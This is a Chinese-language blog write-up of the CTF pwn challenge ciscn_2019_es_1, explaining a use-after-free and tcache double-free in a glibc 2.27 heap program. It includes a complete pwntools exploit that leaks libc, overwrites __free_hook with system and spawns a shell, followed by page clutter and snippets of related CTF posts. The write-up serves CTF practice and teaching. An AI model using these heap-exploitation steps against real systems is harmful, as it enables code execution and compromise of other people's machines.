ciscn_2019_es_1

最新推荐文章于 2024-07-22 15:15:29 发布
最新推荐文章于 2024-07-22 15:15:29 发布
阅读量370 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn python CTF WriteUp 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/124303187
版权

ciscn_2019_es_1

使用checksec查看:
在这里插入图片描述
好家伙全开,看来是堆题,先执行下看看:
在这里插入图片描述
堆题无误,扔进IDA中分析:
在这里插入图片描述
主要流程就是标红的这么几个函数,一个一个进行分析。

首先看menu()
在这里插入图片描述

  • 无用,略过

add()
在这里插入图片描述

  • heap_addr[v0] = (void **)malloc(0x18uLL);:程序先是会自动创建一个大小为0x18的chunk
  • *((_DWORD *)heap_addr[heap_number] + 2) = size;存放name chunk的size
  • *v1 = malloc((unsigned int)size);:存放name chunk的指针

show()
在这里插入图片描述

  • *heap_addr[v1]存的是name
  • *heap_addr[v1] + 12存的是phone

call()
在这里插入图片描述

  • 对应的是delete()
  • free时没有free chunk只是free name chunk
  • free时未清空指针

题目思路

  • 未清空指针,首先考虑UAF、double free
  • 利用unsorted bin获取libc基址
  • 利用double free将chunk里指向name chunk指针修改成指向free_hook
  • 修改free_hook为system@got
  • 执行free即是执行system

步骤解析

常规的利用利用unsorted bin获取libc地址

这个题目用的是libc2.27,所以存在tcache机制,需要绕过tcache机制将chunk放入unsorted bin

因为tcache最大大小是0x400,所以只需申请大于0x400的chunk就可以绕过。

根据 unsorted bin 的特性, fd 和 bk 指针都会指向 main_arena + 96处

在这里插入图片描述

此时存在UAF漏洞,chunk0的指针还在,show(0)可以将main_arena + 96地址给泄露出来

再计算出__malloc_hook从而计算出基地址、__free_hook地址和system@got地址

malloc_hook_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10
base_addr = malloc_hook_addr - libc.symbols['__malloc_hook']
free_hook = base_addr + libc.symbols['__free_hook']
system_addr = base_addr + libc.symbols['system']

通过利用double free修改chunk1的fd指针,让我们的下一个chunk申请到free_hook地址上去,接着再申请到的地址就是free_hook的地址,修改该chunk就相当于修改free_hook

在这里插入图片描述

free_hook修改为system@got

当某个name chunk内容为/bin/sh\x00时,执行free(name chunk)即是执行system('/bin/sh')


完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",28244)
# r = process("../buu/ciscn_2019_es_1")
libc = ELF("../buu/ubuntu18(64).so")

def add(size,name,compary):
	r.sendlineafter('choice:','1')
	r.sendlineafter("compary's name",str(int(size)))
	r.sendafter('input name:',name)
	r.sendafter('call:',compary)

def show(idx):
	r.sendlineafter('choice:','2')
	r.sendlineafter('index:\n',str(idx))

def delete(idx):
	r.sendlineafter('choice','3')
	r.sendlineafter('index:\n',str(idx))

add(0x410,'MMMM','0')
add(0x20,'MMMM','1')
add(0x20,'/bin/sh','2')
# gdb.attach(r)

delete(0)
# gdb.attach(r)
show(0)

malloc_hook_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10
base_addr = malloc_hook_addr - libc.symbols['__malloc_hook']
free_hook = base_addr + libc.symbols['__free_hook']
system_addr = base_addr + libc.symbols['system']

delete(1)
delete(1)
# gdb.attach(r)

add(0x20,p64(free_hook),'1')
# gdb.attach(r)
add(0x20,'MMMM','1')
add(0x20,p64(system_addr),'3')
# gdb.attach(r)

delete(2)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5853
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
ciscn_2019_en_3
fayinq的博客
03-14 445
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
ciscn_2019_es_1 writeup
SkYe's Blog
10-24 700
基本情况 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 简单堆管理程序,有增删查功能。chunk 上限为 12 个,有 0x18 的结构体,又通过链表管理结构体。结构体如下: struct { void **chunk_ptr;//8bit size_t size;//4bit int number;//(12
[BUUCTF]PWN——ciscn_2019_es_1
mcmuyanga的博客
07-20 1328
ciscn_2019_es_1 装了一个ubuntu18.04的机子,终于可以做2.27的题目了 例行检查,64位程序,保护全开 本地运行一下程序,经典的堆体菜单 64位ida载入,看一下各个选项的函数
BUUCTF ciscn_2019_es_1
doudoudedi
01-04 885
我本地直接用fastbin attack直接能打通但是远程似乎有问题 思路 首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell 以下为ubuntu16的环境下本地也就是libc-2.23 exp: #!/usr/bin/pyth...
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4367
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
赛点资源数据包_嵌入式_2019.zip
06-28
1. **硬件基础**:这部分可能包括各种微处理器和微控制器的介绍,如ARM架构、RISC-V等,以及它们的性能、功耗和应用范围。还可能涉及存储器类型(如RAM、ROM)和外设接口(如I2C、SPI、UART)。 2. **操作系统与...
Elasticsearch 中国开发者调查报告_2019.pdf
12-20
2010年 Elasticsearch 首个...为了深入了解 Elasticsearch 开发者群体的现状,2019 年 11 月,Elastic 技术社区、阿里巴巴 Elasticsearch 技术团队和阿里云开发者社区三方联合发起了 Elasticsearch 开发者调研活动。
2019年欧洲车身会议蔚来ES8_Benchmark数据.pdf
01-21
2019年欧洲车身会议蔚来ES8_Benchmark数据
opengl-es.zip_opengl_opengl es
09-14
OpenGL ES(OpenGL for Embedded Systems)是OpenGL的一个精简版本,专为嵌入式设备和移动设备设计,如智能手机、平板电脑等。它主要用于处理2D和3D图形渲染,是开发游戏、图形应用和增强现实应用的核心技术。OpenGL...
GLView.rar_class A_opengl es
09-19
A helper class to simplify writing an Activity that renders using OpenGL ES.
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4863
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
ciscn_2019_n_5
qq_39869547的博客
01-11 957
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
pwnciscn_2019_es_2
Nothing
12-24 2763
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
ciscn2019部分writeup
Sea_Sand息禅
06-06 1291
Web 1、JustSoso 拿到源码 打开靶机,查看源码得到提示: 一看就是文件读取,然后就文件读取走一波。 file=php://filter/read=convert.base64-encode/resource=hint.php base64解码拿到hint.php的源码: <?php class Handle{ private $handle; ...
详细ciscn_2019_s_3题解
xieyichensss的博客
04-23 1376
来了来了,我拖了好久,因为吧,之前做了个堆题,大概用了一周才做完,做完堆题,下一个题是栈的,我以为会很简单,但是对我来说很难诶。上才艺… (系统调用其他师傅都有写,我就不赘述啦啦啦啦啦),因为师傅们翻到我这里肯定对系统调用有了解了呀,我这么菜,只能在最下边呜呜呜。 1.拖入ida,反汇编(64位),注意到函数传参与32位会不同。 在函数框内发现vuln(大家应该对这种函数很熟悉了吧),还有gadgets函数,奇怪,正常的栈不会有这种东西啊,于是我就点进去看了看,看到了这两个像rax进行传参的汇编,这就为我们
Python如何将字符串连接在一起并使用`join()`方法】
qq_36253366的博客
07-19 418
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
【影刀】自动化办公介绍与RPA机器人实例
最新发布
weixin_44195690的博客
07-22 158
影刀RPA是杭州分叉智能科技有限公司开发的一款自动化办公软件。它是基于Machine Behavior Learning(机器行为学习)技术,为各行业提供行为自动化办公机器人。
es 删除数据_干货 | 携程Elasticsearch数据同步实践
06-07
您需要关于 Elasticsearch 的数据删除操作的信息吗?如果是的话,可以使用 Elasticsearch 提供的 Delete API 来删除单个或多个文档。例如,您可以使用以下命令删除具有指定 ID 的单个文档: ``` DELETE /my_index/_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值